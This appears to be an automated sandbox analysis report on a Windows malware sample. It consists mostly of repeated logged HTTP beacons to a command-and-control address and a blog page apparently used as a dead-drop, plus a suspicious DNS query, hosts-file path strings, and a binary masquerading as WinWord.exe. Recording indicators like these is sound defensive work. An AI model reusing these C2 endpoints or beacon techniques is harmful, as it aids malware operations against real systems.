Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /show.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.163.241.232:12354Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5655029807 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cnCookie: U_TRS1=0000001f.32982510.6759aec0.58c28a68; U_TRS2=0000001f.32a12510.6759aec0.40768b16
Source: global trafficDNS traffic detected: DNS query: krnaver.com
Source: global trafficDNS traffic detected: DNS query: blog.sina.com.cn
Source: rundll32.exe, 00000005.00000002.4133737474.0000000005FBD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4133198288.00000000053FD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://107.163.241.232:12354/show.php
Source: otsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://192.168.100.83/
Source: ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://192.168.100.83/9.htm
Source: otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://192.168.100.83/9.htmhttp://192.168.100.83/F.htm%D
Source: otsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://192.168.100.83/F.htm
Source: rundll32.exe, rundll32.exe, 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%s
Source: rundll32.exe, 00000005.00000002.4135622472.0000000010016000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: http://blog.sina.com.cn/u/%sXGRyaXZlcnNcZXRjXGhvc3RzLmljcw==XGRyaXZlcnNcZXRjXGhvc3Rz
Source: rundll32.exe, 00000005.00000002.4132279546.00000000032C6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.3974473541.0000000005FC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.sina.com.cn/u/5655029807
Source: otsIBG7J9b.exe, otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.1.com
Source: otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmp, ufcpp.exe, 00000004.00000002.1697577110.0000000000407000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://www.1.comhttp://192.168.100.83/a
Source: rundll32.exe, 00000005.00000002.4132279546.000000000327A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/
Source: rundll32.exe, 00000005.00000002.4133972217.000000000605D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.sina.com.cn/u/5655029807
Source: unknownHTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000C160: wsprintfA,DeviceIoControl,5_2_1000C160
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100049F0 ExitWindowsEx,5_2_100049F0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_10005A105_2_10005A10
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000EB805_2_1000EB80
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000DB905_2_1000DB90
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100104005_2_10010400
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000F5005_2_1000F500
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_100096405_2_10009640
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_1000EF705_2_1000EF70
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10011A56 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10001000 appears 292 times
Source: otsIBG7J9b.exeBinary or memory string: OriginalFilename vs otsIBG7J9b.exe
Source: otsIBG7J9b.exe, 00000000.00000000.1679471285.0000000000400000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exe, 00000000.00000002.1687821051.0000000000407000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exe, 00000000.00000000.1679491267.0000000000415000.00000080.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exe, 00000000.00000003.1682351281.0000000002280000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
Source: otsIBG7J9b.exeBinary or memory string: OriginalFilenameWinWord.exeL vs otsIBG7J9b.exe
